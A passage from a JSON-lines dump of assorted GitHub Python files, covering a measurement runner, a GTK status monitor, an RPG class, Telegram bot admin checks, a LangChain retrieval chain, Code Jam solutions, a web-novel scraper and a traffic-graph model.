end_time = time.perf_counter()\n\n print(\" {0}\".format(end_time - start_time), file=sys.stderr)\n\n success = True\n break\n except Exception as e:\n print(e, \"retrying\", file=sys.stderr)\n\n if not success:\n print(\"Giving up on %s...\" % website, file=sys.stderr)\n return\n\n\ndef main():\n print(\"DELAY = %d, TRACE = %s\" % (DELAY, TRACE), file=sys.stderr)\n print(file=sys.stderr)\n\n result_path = Path(MEASURE_DIR)\n if not result_path.exists():\n result_path.mkdir()\n for website in sys.stdin:\n website = website.strip()\n if not website: break\n measure(website, result_path)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n sys.exit(\"Usage: ./run.py user\")\n\n try:\n pw_record = pwd.getpwnam(sys.argv[1])\n except KeyError:\n sys.exit(\"User %s doesn't exist\", sys.argv[1])\n\n def demote():\n user_uid = pw_record.pw_uid\n user_gid = pw_record.pw_gid\n os.setgid(user_gid)\n os.setuid(user_uid)\n\n main()\n print(\"DONE!\", file=sys.stderr)\n","repo_name":"zhangwen0411/cs244-pa3-mahimahi","sub_path":"previous/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33258123185","text":"import socket\nimport select\nimport multiprocessing\nfrom const import HOST,PORT\n\n# Try to import Gtk for Python 3\ntry:\n\tfrom gi.repository import Gtk\n\tfrom gi.repository import GObject\nexcept:\n# If it doesn't work, try to import for Python 2\n\timport gtk as Gtk\n\timport gobject as GObject\n\nclass StatusWindow(Gtk.Window):\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self)\n\t\tself.set_title(\"Contrôle de la pige\")\n\t\tself.set_size_request(600, 150)\n\t\tself.set_resizable(False)\n\t\t\n\t\tself.psbar = Gtk.ProgressBar()\n\t\tself.label = Gtk.Label()\n\t\tself.__label_set_status(False)\n\t\tself.level = multiprocessing.Value('d',0.0)\n\t\tself.running = multiprocessing.Value('b',False)\n\t\t\n\t\tself.vbox = Gtk.VBox(spacing=8)\n\t\tself.add(self.vbox)\n\t\tself.vbox.pack_start(self.psbar, True, True, 8)\n\t\tself.vbox.pack_start(self.label, False, False, 8)\n\t\t\n\t\tself.timer = GObject.timeout_add(20, self.__refresh)\n\t\t\n\t\tself.run_thread = multiprocessing.Value('b',True)\n\t\tmultiprocessing.Process(target=self.__server_loop,args=(self.level,self.running,self.run_thread)).start()\n\t\t\n\tdef stop_threads(self):\n\t\tself.run_thread.value = False\n\t\t\n\tdef 
__refresh(self):\n\t\tself.__label_set_status(self.running.value)\n\t\tself.psbar.set_fraction(self.level.value)\n\t\treturn True\n\t\n\tdef __label_set_status(self,b):\n\t\tif b:\n\t\t\tself.label.set_markup(\"Enregistrement...\")\n\t\telse:\n\t\t\tself.label.set_markup(\"Pige stoppée\")\n\t\n\tdef __server_loop(self, level_value, running_recorder, run_thread):\n\t\tdef read_line(s):\n\t\t\tret = ''\n\t\t\twhile True:\n\t\t\t\tc = s.recv(1).decode('utf-8','ignore')\n\t\t\t\tif c == '\\n' or c =='\\r' or c == '':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tret += c\n\t\t\treturn ret\n\t\t\n\t\tclient_count = 0\n\t\t\n\t\tself.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.s.bind((HOST, PORT))\n\t\tself.s.listen(5)\n\t\tself.s.settimeout(1)\n\t\t\n\t\twhile run_thread.value:\n\t\t\ttry:\n\t\t\t\tconn, addr = self.s.accept()\n\t\t\t\tif conn:\n\t\t\t\t\trunning_recorder.value = True\n\t\t\t\t\twhile run_thread.value:\n\t\t\t\t\t\tdata = read_line(conn)\n\t\t\t\t\t\tif not data:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tlevel = float(data[:-1])/100\n\t\t\t\t\t\tlevel_value.value = level\n\t\t\t\t\tconn.close()\n\t\t\t\t\tlevel_value.value = 0\n\t\t\t\t\trunning_recorder.value = False\n\t\t\texcept:\n\t\t\t\trunning_recorder.value = False\n\nwin = StatusWindow()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\nwin.stop_threads()\nexit(0)\n","repo_name":"tiennotg/pigix","sub_path":"status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38988538794","text":"import copy\r\nimport random\r\nimport sys\r\nsys.path.append(\"../RPG2v3_def\")\r\nfrom rpg2_classdefinitions import (Player_PC, Pet_NPC, ItemBag_PC,\r\n Spell_PC, Monster_NPC, Weapon_PC,\r\n Armor_PC, QuestItems_NPC, Access_NPC)\r\nimport rpg2_party_management_functions as party_func\r\nfrom rpg2_constants import Constants\r\nfrom rpg2_constant_lists import List_Constants\r\nfrom rpg2_constant_quests import Q_Constants\r\nQ = Q_Constants()\r\nL = List_Constants()\r\nC = Constants()\r\nimport rpg2_level_up_function as lvlup_func\r\n#hunter will be part of the monster hunter guild\r\n#hunter will be a class that focuses on poison, traps and animal companion\r\nname = \"Hunter\"\r\nmaxhp = C.LVL_UP_HP_MID\r\natk = C.LVL_UP_ATK_MID\r\ndefense = C.LVL_UP_DEF_MID\r\nskill = C.LVL_UP_SKL_HIGH\r\n#not a spell caster\r\nmana = C.LVL_UP_MANA_LOW\r\n#starting stats\r\nhunter = Player_PC(\"Hunter\", 1, 15, 15, 3, 3, 5, 0, 0)\r\n#hunter comes with an animal companion\r\n#this summon will be much more focused on attacking\r\ncompanion = Pet_NPC(\"Spirit Animal\", 1, 5)\r\n'''#hunters are naturally trained at observation\r\n'observe, will give them and their ally a bonus to attack'\r\n#hunters need to take care of their weapons\r\n'buff, will boost their weapon effect'\r\n#hunters need to be able to deal with poison and injuries\r\n'heal, will greatly decrease poison'\r\n#hunters work with their companions\r\n'command, will allow their ally to perform two actions'\r\n#hunters weaken their prey first\r\n'debuff, decrease enemy stats based on poison'\r\n#hunters use traps and tools\r\n'throw explosive, will send a bomb into the enemy party'\r\n'the bomb can be damaging or poisoning'''\r\n\r\n\r\n#method to upgrade the spirit companion\r\ndef companion_upgrade(p_npc, q_i, a_i):\r\n if a_i.rank > Q.GOLD and p_npc.stage < 3:\r\n print (\"Looks like you're ready for the next step. 
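# --- Editorial aside (illustrative sketch, not part of this file): the status.py record above shares the recording level between the GTK process and the socket-server process through multiprocessing.Value, which lives in shared memory. A minimal standalone demonstration of that primitive:\nimport multiprocessing\n\ndef writer(level):\n    level.value = 0.75  # assignment in the child is visible to the parent\n\nif __name__ == '__main__':\n    level = multiprocessing.Value('d', 0.0)  # 'd' = C double, as in status.py\n    p = multiprocessing.Process(target=writer, args=(level,))\n    p.start()\n    p.join()\n    assert level.value == 0.75\n# --- end editorial aside ---\n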
\")\r\n if a_i.rank > Q.MASTER and p_npc.stage < 6:\r\n print (\"You've come a long way. \")\r\n print (\"I think you're ready for the next stage. \")\r\n print (\"I can help you strengthen your BOND or TRAIN. B/T? \")\r\n if p_npc.stage < C.STAGE_LIMIT:\r\n if a_i.rank <= Q.GOLD and p_npc.stage >= 2:\r\n print (\"Looks like you need more experience. \")\r\n if a_i.rank <= Q.MASTER and p_npc.stage >= 5:\r\n print (\"You're still lacking. \")\r\n else:\r\n print (\"You've done a lot together. \")\r\n print (\"I can see that your bond is strong. \")\r\n print (\"Do you want me to help you manifest that bond? \")\r\n print (\"I'll need \", p_npc.atk ** C.INCREASE_EXPONENT, \"mana gem to do it. \")\r\n check = input(\"YES/NO? Y/N? \")\r\n if check.upper() == \"Y\" and q_i.managem >= p_npc.atk ** C.INCREASE_EXPONENT:\r\n q_i.managem -= p_npc.atk ** C.INCREASE_EXPONENT\r\n lvlup_func.spirit_stage_up(p_npc)\r\n else:\r\n print (\"Come back when you're ready. \")\r\n elif p_npc.stage == C.STAGE_LIMIT:\r\n print (\"You want to help your companion train? \")\r\n print (\"I'll need \", p_npc.atk * C.INCREASE_EXPONENT, \"mana gem to do it. \")\r\n check = input(\"YES/NO? Y/N? \")\r\n if check.upper() == \"Y\" and q_i.managem >= p_npc.atk * C.INCREASE_EXPONENT:\r\n q_i.managem -= p_npc.atk * C.INCREASE_EXPONENT\r\n lvlup_func.pet_atk_up(p_npc)\r\n else:\r\n print (\"Come back when you're ready. \")\r\n#function that adds the hunter to the party\r\ndef add_hunter(h_p, p_npc):\r\n hro = None\r\n copy_hero = copy.copy(hunter)\r\n for hero in h_p:\r\n if \"Hunter\" in hero.name:\r\n hro = hero\r\n if hro == None:\r\n party_func.add_to_party(h_p, copy_hero)\r\n else:\r\n print (\"You already have a hunter. \")\r\n cmp = None\r\n copy_comp = copy.copy(companion)\r\n for ally in p_npc:\r\n if \"Spirit\" in ally.name:\r\n cmp = ally\r\n if cmp == None:\r\n p_npc.append(copy_comp)\r\n\r\n","repo_name":"DXing330/pygame-RPG","sub_path":"pygameRPG/RPG2v3/RPG2v3_functions/RPG2v3_quest/rpg2_hunter_function.py","file_name":"rpg2_hunter_function.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2650458527","text":"\"\"\"\n=========\nAssociate\n=========\n\nWidgets for association rules.\n\n\"\"\"\n\n# Category description for the widget registry\n\nNAME = \"Optical Elements\"\n\nDESCRIPTION = \"Widgets for Shadow Optical Elements.\"\n\n#BACKGROUND = \"#bcf7ff\"\nBACKGROUND = \"#A9D0F5\"\n\nICON = \"icons/opticalElements.png\"\n\n\nPRIORITY = 102\n","repo_name":"oasys-kit/ShadowOui","sub_path":"orangecontrib/shadow/widgets/optical_elements/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"26630140851","text":"# Copyright (C) 2020 - 2021 Divkix. All rights reserved. Source code available under the AGPL.\r\n#\r\n# This file is part of Alita_Robot.\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU Affero General Public License as\r\n# published by the Free Software Foundation, either version 3 of the\r\n# License, or (at your option) any later version.\r\n\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# GNU Affero General Public License for more details.\r\n\r\n# You should have received a copy of the GNU Affero General Public License\r\n# along with this program. If not, see .\r\n\r\n\r\nfrom pyrogram.types import CallbackQuery, Message\r\nfrom traceback import format_exc\r\n\r\nfrom alita import DEV_USERS, LOGGER, OWNER_ID, SUDO_USERS\r\n\r\nSUDO_LEVEL = SUDO_USERS + DEV_USERS + [int(OWNER_ID)]\r\nDEV_LEVEL = DEV_USERS + [int(OWNER_ID)]\r\n\r\n\r\nasync def admin_check(m: Message or CallbackQuery) -> bool:\r\n    \"\"\"Checks if user is admin or not.\"\"\"\r\n    if isinstance(m, Message):\r\n        user_id = m.from_user.id\r\n    if isinstance(m, CallbackQuery):\r\n        user_id = m.message.from_user.id\r\n\r\n    try:\r\n        if user_id in SUDO_LEVEL:\r\n            return True\r\n    except Exception as ef:\r\n        LOGGER.error(format_exc())\r\n\r\n    user = await m.chat.get_member(user_id)\r\n    admin_strings = (\"creator\", \"administrator\")\r\n\r\n    if user.status not in admin_strings:\r\n        reply = \"You need to be an admin to use this command.\"\r\n        try:\r\n            await m.edit_text(reply)\r\n        except Exception as ef:\r\n            await m.reply_text(reply)\r\n            LOGGER.error(ef)\r\n            LOGGER.error(format_exc())\r\n        return False\r\n\r\n    return True\r\n\r\n\r\n
async def check_rights(m: Message or CallbackQuery, rights) -> bool:\r\n    \"\"\" Check Admin Rights \"\"\"\r\n    if isinstance(m, Message):\r\n        user_id = m.from_user.id\r\n        chat_id = m.chat.id\r\n        app = m._client\r\n    if isinstance(m, CallbackQuery):\r\n        user_id = m.message.from_user.id\r\n        chat_id = m.message.chat.id\r\n        app = m.message._client\r\n\r\n    user = await app.get_chat_member(chat_id, user_id)\r\n    if user.status == \"member\":\r\n        return False\r\n    admin_strings = (\"creator\", \"administrator\")\r\n    if user.status in admin_strings:\r\n        return bool(getattr(user, rights, None))\r\n    return False\r\n\r\n\r\n
async def owner_check(m: Message or CallbackQuery) -> bool:\r\n    \"\"\"Checks if user is owner or not.\"\"\"\r\n    if isinstance(m, Message):\r\n        user_id = m.from_user.id\r\n    if isinstance(m, CallbackQuery):\r\n        user_id = m.message.from_user.id\r\n        m = m.message\r\n\r\n    try:\r\n        if user_id in SUDO_LEVEL:\r\n            return True\r\n    except Exception as ef:\r\n        LOGGER.info(ef, m)\r\n        LOGGER.error(format_exc())\r\n\r\n    user = await m.chat.get_member(user_id)\r\n\r\n    if user.status != \"creator\":\r\n        if user.status == \"administrator\":\r\n            reply = \"Only the chat owner can use this command.\"\r\n        else:\r\n            reply = \"You are not an admin here, and this command is owner-only.\"\r\n        try:\r\n            await m.edit_text(reply)\r\n        except Exception as ef:\r\n            await m.reply_text(reply)\r\n            LOGGER.error(ef)\r\n            LOGGER.error(format_exc())\r\n\r\n        return False\r\n\r\n    return True\r\n","repo_name":"Hirojazz/Tessia","sub_path":"alita/utils/admin_check.py","file_name":"admin_check.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25551380788","text":"\"\"\"This module contains functions for loading a ConversationalRetrievalChain\"\"\"\n\nimport logging\n\nimport wandb\nfrom langchain.chains import ConversationalRetrievalChain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.vectorstores import Chroma\nfrom prompts import load_chat_prompt\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef load_vector_store(wandb_run: wandb.run, openai_api_key: str) -> Chroma:\n    \"\"\"Load a vector store from a Weights & Biases artifact\n    Args:\n        run 
(wandb.run): An active Weights & Biases run\n openai_api_key (str): The OpenAI API key to use for embedding\n Returns:\n Chroma: A chroma vector store object\n \"\"\"\n # load vector store artifact\n vector_store_artifact_dir = wandb_run.use_artifact(\n wandb_run.config.vector_store_artifact, type=\"search_index\"\n ).download()\n embedding_fn = OpenAIEmbeddings(openai_api_key=openai_api_key)\n # load vector store\n vector_store = Chroma(\n embedding_function=embedding_fn, persist_directory=vector_store_artifact_dir\n )\n\n return vector_store\n\n\ndef load_chain(wandb_run: wandb.run, vector_store: Chroma, openai_api_key: str):\n \"\"\"Load a ConversationalQA chain from a config and a vector store\n Args:\n wandb_run (wandb.run): An active Weights & Biases run\n vector_store (Chroma): A Chroma vector store object\n openai_api_key (str): The OpenAI API key to use for embedding\n Returns:\n ConversationalRetrievalChain: A ConversationalRetrievalChain object\n \"\"\"\n retriever = vector_store.as_retriever()\n llm = ChatOpenAI(\n openai_api_key=openai_api_key,\n model_name=wandb_run.config.model_name,\n temperature=wandb_run.config.chat_temperature,\n max_retries=wandb_run.config.max_fallback_retries,\n )\n chat_prompt_dir = wandb_run.use_artifact(\n wandb_run.config.chat_prompt_artifact, type=\"prompt\"\n ).download()\n qa_prompt = load_chat_prompt(f\"{chat_prompt_dir}/prompt.json\")\n qa_chain = ConversationalRetrievalChain.from_llm(\n llm=llm,\n chain_type=\"stuff\",\n retriever=retriever,\n combine_docs_chain_kwargs={\"prompt\": qa_prompt},\n return_source_documents=True,\n )\n return qa_chain\n\n\ndef get_answer(\n chain: ConversationalRetrievalChain,\n question: str,\n chat_history: list[tuple[str, str]],\n):\n \"\"\"Get an answer from a ConversationalRetrievalChain\n Args:\n chain (ConversationalRetrievalChain): A ConversationalRetrievalChain object\n question (str): The question to ask\n chat_history (list[tuple[str, str]]): A list of tuples of (question, answer)\n Returns:\n str: The answer to the question\n \"\"\"\n result = chain(\n inputs={\"question\": question, \"chat_history\": chat_history},\n return_only_outputs=True,\n )\n response = f\"Answer:\\t{result['answer']}\"\n return response\n","repo_name":"wandb/edu","sub_path":"llm-apps-course/src/chain.py","file_name":"chain.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"61"} +{"seq_id":"23634032301","text":"import os, sys\r\n\r\n\r\nd = {'a' : 'y' ,\r\n 'b' : 'h',\r\n 'c':'e',\r\n 'd':'s',\r\n 'e':'o',\r\n 'f':'c',\r\n 'g':'v',\r\n 'h':'x',\r\n 'i':'d',\r\n 'j':'u',\r\n 'k':'i',\r\n 'l':'g',\r\n 'm':'l',\r\n 'n':'b',\r\n 'o':'k',\r\n 'p':'r',\r\n 'q':'z',\r\n 'r':'t',\r\n 's':'n',\r\n 't':'w',\r\n 'u':'j',\r\n 'v':'p',\r\n 'w':'f',\r\n 'x':'m',\r\n 'y':'a',\r\n 'z':'q',\r\n ' ': ' '}\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #run main \r\n lines = open( \"A-small-attempt2.in\" ).readlines()\r\n #lines = sys.stdin.readlines()\r\n out = open( \"A-small-attempt2.out\" , 'w' )\r\n x = int( lines[0] )\r\n count = 0\r\n output = \"Case #{0}: {1}\\n\"\r\n for G in lines[1:]:\r\n if count == x:\r\n break\r\n count += 1\r\n translation = \"\"\r\n for char in G.strip( '\\n' ):\r\n translation += d[char]\r\n out.write( output.format( count, translation ) )\r\n\r\n 
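# --- Editorial aside (illustrative sketch, not part of this file): the per-character loop above is a classic substitution-cipher decode; the same mapping can be applied in one call with str.maketrans/str.translate:\nmapping = {'a': 'y', 'b': 'h', 'o': 'k', 'z': 'q', ' ': ' '}  # excerpt of d\ntable = str.maketrans(mapping)\nassert 'ab oz'.translate(table) == 'yh kq'\n# --- end editorial aside ---\n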
out.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/2557.py","file_name":"2557.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30644860814","text":"# find count of all the subarrays with sum 5 and length 3\n# ans = 2\n\narr = [1,2,3,0,5,1,23,0,4,1]\ncount = 0\nfor i in range(0, len(arr)):\n sum = 0\n length = 0\n for j in range(i, len(arr)):\n sum = sum + arr[j]\n length+=1\n if sum == 5 and length == 3:\n count = count+1\n\nprint(count)\n\n","repo_name":"adityabhanu/DSA-Practice-Python","sub_path":"Arrays/arr02.py","file_name":"arr02.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7854156054","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom sklearn.neighbors import VALID_METRICS\nfrom tqdm import tqdm\nfrom time import sleep\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\nurl_header = 'https://kakuyomu.jp/works'\n\ndef get_text(url, gyokan=False):\n print(f'Start each page at {url}')\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n # print(soup)\n text = soup.find(class_='widget-episode-inner')\n texts = [line.text for line in text.find_all('p')]\n texts = [line.replace('\\u3000', '') for line in texts]\n if not gyokan:\n texts = [line for line in texts if line != '']\n return texts\n\ndef get_page(code, gyokan=False):\n url = url_header+ '/' + code \n print(f'url : {url}')\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n title = soup.find(id=\"workTitle\")\n title = title.get_text()\n author = soup.find(id=\"workAuthor\")\n author = author.get_text()\n indices = soup.find(class_='widget-toc-main')\n if indices == None:\n raise ValueError(f\"Indices not found... 
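# --- Editorial aside (illustrative sketch, not part of this file): the nested loops in the arr02 record above are O(n^2); with the window length fixed at 3, a sliding window counts the same subarrays in O(n):\ndef count_windows(arr, target_sum=5, length=3):\n    window = sum(arr[:length])\n    count = int(window == target_sum)\n    for i in range(length, len(arr)):\n        window += arr[i] - arr[i - length]  # slide the fixed-size window\n        count += window == target_sum\n    return count\n\nassert count_windows([1, 2, 3, 0, 5, 1, 23, 0, 4, 1]) == 2  # matches arr02\n# --- end editorial aside ---\n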
at {url}\")\n else:\n hrefs = ['/'.join(a['href'].split('/')[-3:]) for a in indices.find_all('a')]\n #hrefs = sorted(hrefs, key=lambda x: int(x.split('/')[-1]))\n print(f'length of hrefs {len(hrefs)}')\n for href in tqdm(hrefs):\n url = url_header + '/' + href\n lines = get_text(url, gyokan)\n sleep(1.0)\n with open(code + '.txt', 'a', encoding='utf-8') as f:\n f.write('\\n'.join(lines) + \"\\n\")\n rename_file(code, title, author)\n\nimport os\nimport re\ninvalid_string = re.compile(r'[\\\\/:*?\"<<>|]+')\ndef rename_file(code, title, author):\n title = invalid_string.sub('', title)\n author = author.split('\\n')[-2]\n author = invalid_string.sub('', author)\n os.rename(code + '.txt', f'{title}_{author}.txt')\n\nimport argparse\n\nif __name__=='__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--url', type=str)\n\n args = parser.parse_args()\n code = args.url.split('/')[-1]\n print(f'code {code}')\n get_page(code, gyokan=False)","repo_name":"blackpopo/QiitaLaboratory","sub_path":"kakuyomu_scraper.py","file_name":"kakuyomu_scraper.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23545633521","text":"# /usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n\r\nIMP = \"IMPOSSIBLE\"\r\nHAPPY = \"+\"\r\nBLANK = \"-\"\r\n\r\n\r\ndef convert_row_to_int(row):\r\n return [1 if p == HAPPY else -1 for p in row]\r\n\r\n\r\ndef convert_int_to_row(int_row):\r\n return \"\".join([HAPPY if p == 1 else BLANK for p in int_row])\r\n\r\n\r\nclass PancakeRow:\r\n\r\n __slots__ = (\"row\",\r\n \"step\",\r\n \"size_row\",\r\n \"eval_state\",\r\n \"previous_pos\")\r\n fsize = None\r\n\r\n def __init__(self,\r\n s,\r\n k,\r\n step=0,\r\n previous_pos=None):\r\n self.row = s\r\n self.step = step\r\n self.size_row = len(s)\r\n self.eval_state = self.row.count(1)\r\n self.previous_pos = previous_pos\r\n\r\n def all_happy(self):\r\n return self.eval_state == self.size_row\r\n\r\n def flip(self, pos):\r\n if pos == self.previous_pos:\r\n # print(\"REJECTED ppos\", convert_int_to_row(self.row), pos)\r\n return None\r\n if self.size_row - pos < self.fsize:\r\n # print(\"REJECTED hight pos\", convert_int_to_row(self.row), pos, (self.size_row - pos, self.fsize))\r\n return None\r\n else:\r\n new_row = [-1 * p if pos <= i < pos +\r\n self.fsize else p for i, p in enumerate(self.row)]\r\n return PancakeRow(new_row,\r\n self.fsize,\r\n step=self.step + 1,\r\n previous_pos=pos)\r\n\r\n\r\nif __name__ == '__main__':\r\n T = int(input())\r\n for ti in range(T):\r\n test_case = input()\r\n S, K = test_case.split()\r\n K = int(K)\r\n Sint = convert_row_to_int(S)\r\n PancakeRow.fsize = K\r\n prow = PancakeRow(Sint, K)\r\n\r\n if prow.all_happy():\r\n print(\"Case #{}: {}\".format(ti + 1, 0))\r\n continue\r\n row_try = [prow]\r\n\r\n max_level = 10000\r\n level = 0\r\n STOP = False\r\n already_tested_pattern = []\r\n while row_try != [] and level < max_level and not STOP:\r\n level += 1\r\n evaluation = [r.eval_state for r in row_try]\r\n maxi = max(evaluation)\r\n for counter in range(evaluation.count(maxi)):\r\n idxmax = evaluation.index(maxi)\r\n row = row_try.pop(idxmax)\r\n evaluation.pop(idxmax)\r\n if row.row in already_tested_pattern:\r\n continue\r\n else:\r\n already_tested_pattern.append(row.row)\r\n for pos in range(0, row.size_row - (K - 1)):\r\n new_row = row.flip(pos)\r\n if new_row is not None:\r\n if new_row.all_happy():\r\n print(\"Case #{}: {}\".format(ti + 1, new_row.step))\r\n STOP = True\r\n 
break\r\n row_try.append(new_row)\r\n if STOP:\r\n break\r\n if level >= max_level or (row_try == [] and not STOP):\r\n print(\"Case #{}: {}\".format(ti + 1, IMP))\r\n # print()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3171.py","file_name":"3171.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41129985917","text":"from data.scats import ScatsData\nfrom math import radians, cos, sin, asin, sqrt, degrees, acos, floor\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\nSCATS_DATA = ScatsData()\n\n\nclass Vector(object):\n\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n\n def angle(self, other):\n \"\"\"Angle of vectors\n Calculate the angle between self and other vector\n # Arguements\n other: 2D vector, vector to check angle against\n # Returns\n angle_in_degrees: Float, angle between provided vectors\n \"\"\"\n\n dot_product = self.x * other.x + self.y * other.y\n mod_of_vector = sqrt(self.x ** 2 + self.y ** 2) * sqrt(other.x ** 2 + other.y ** 2)\n angle = dot_product / mod_of_vector\n angle_in_degrees = degrees(acos(angle))\n return angle_in_degrees\n\n def distance(self, other):\n \"\"\"Distance\n Calculate distance to other vector\n # Arguements\n other: 2D vector\n # Returns\n result: Float, distance from self to other\n \"\"\"\n\n lon1 = radians(self.x)\n lon2 = radians(other.x)\n lat1 = radians(self.y)\n lat2 = radians(other.y)\n\n # Haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n\n c = 2 * asin(sqrt(a))\n\n # Radius of earth in kilometers. Use 3956 for miles\n r = 6371\n\n # calculate the result\n return (c * r)\n\n def to_tuple(self):\n lon = radians(self.x)\n lat = radians(self.y)\n\n a = sin\n\n return (self.x, self.y)\n\n def __sub__(self, other):\n return Vector(other.x - self.x, other.y - self.y)\n\n def __neg__(self):\n return Vector(-self.x, -self.y)\n\n def __str__(self):\n return \"({0}, {1})\".format(self.x, self.y)\n\n\nclass Node(object):\n\n def __init__(self, scats_number, coordinates):\n self.scats_number = scats_number\n self.coordinates = Vector(coordinates[0], coordinates[1])\n self.incoming_connections = []\n self.outgoing_connections = []\n\n def find_outgoing_connections(self, graph):\n \"\"\"Find outgoing connections\n Searches through incoming connections to find outgoing connections\n # Arguements\n graph: Node List, represents the node graph\n # Returns\n None\n \"\"\"\n\n for connection in self.incoming_connections:\n connection = self.get_respective_outgoing_connection(connection, graph)\n if connection != None:\n self.outgoing_connections.append(connection)\n\n def get_respective_outgoing_connection(self, connection, graph):\n \"\"\"Get respective outgoing connection\n Gets an incomming connection from another node which is the inverse of the provided connection\n # Arguements\n connection: Connection, the incoming connection\n graph: Node List, represents the node graph\n # Returns\n best_connection: the connection most probable to be the inverse of the provided connection\n \"\"\"\n\n # Find all valid connections\n valid_connections = []\n for node in graph.nodes:\n for external_connection in node.incoming_connections:\n if self.connections_share_one_street(connection, external_connection):\n if self.connection_within_angle_range(connection, external_connection):\n 
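# --- Editorial aside (illustrative check, not part of this file): Vector.distance above is the haversine great-circle distance, with .x treated as longitude, .y as latitude, and the same 6371 km Earth radius:\nfrom math import radians, sin, cos, asin, sqrt\n\ndef haversine_km(lon1, lat1, lon2, lat2):\n    lon1, lat1, lon2, lat2 = map(radians, (lon1, lat1, lon2, lat2))\n    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2\n    return 2 * 6371 * asin(sqrt(a))\n\n# One degree of latitude is roughly 111.2 km anywhere on the globe:\nassert abs(haversine_km(145.0, -37.0, 145.0, -38.0) - 111.2) < 1.0\n# --- end editorial aside ---\n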
valid_connections.append(external_connection)\n\n if len(valid_connections) < 1:\n return\n\n # Select best connection\n best_connection = valid_connections[0]\n origin = connection.node.coordinates\n for external_connection in valid_connections:\n\n current_position = external_connection.node.coordinates\n best_position = best_connection.node.coordinates\n\n if origin.distance(current_position) < origin.distance(best_position):\n best_connection = external_connection\n elif (origin.distance(current_position) == origin.distance(best_position)):\n if origin.angle(-current_position) < origin.angle(-best_position):\n best_connection = external_connection\n return best_connection\n\n def connections_share_one_street(self, connection_a, connection_b):\n \"\"\"Connections share one street\n Checks if the provided connections share ONLY one street\n # Arguements\n connection_a: Connection\n connection_b: Connection\n # Returns\n result: bool, true if only one street overlaps\n \"\"\"\n\n if connection_a.contains_streets_count(connection_b.streets) == 1:\n return True\n return False\n\n def connection_within_angle_range(self, connection_a, connection_b):\n \"\"\"Connection within angle range\n Checks if connection_b falls within 45 degrees of the direction connection_a is heading\n # Arguements\n connection_a: Connection, origin\n connection_b: Connection, target\n # Returns\n result: bool, true if within 45 degrees\n \"\"\"\n\n vector_a = connection_a.direction\n vector_b = connection_a.node.coordinates - connection_b.node.coordinates\n if abs(vector_a.angle(vector_b)) < 45:\n return True\n return False\n\n\nclass Connection(object):\n\n def __init__(self, name, c_id, node):\n self.node = node\n self.streets = self.get_streets_from_name(name)\n self.direction = self.get_vector_from_name(name)\n self.id = c_id\n\n def get_model(self, model_name):\n \"\"\"Get model\n Locates the model predicted values in JSON file\n # Arguements\n model_name: string, name of the model to locate\n # Returns\n model: list, predicted values for this connection\n \"\"\"\n\n try:\n with open('predictedvalues.json', 'r') as openfile:\n\n # Reading from json file\n json_object = json.load(openfile)\n model = json_object[model_name][str(self.node.scats_number)][str(self.id)]\n return model\n except Exception as e:\n print(\"{0} model for junction {1} could not be found!\".format(model_name, self.show_connection()))\n\n def contains_streets_count(self, streets):\n \"\"\"Contains streets count\n Counts how many streets overlap in self.streets and provided list\n # Arguements\n streets: list, values to overlap with\n # Returns\n 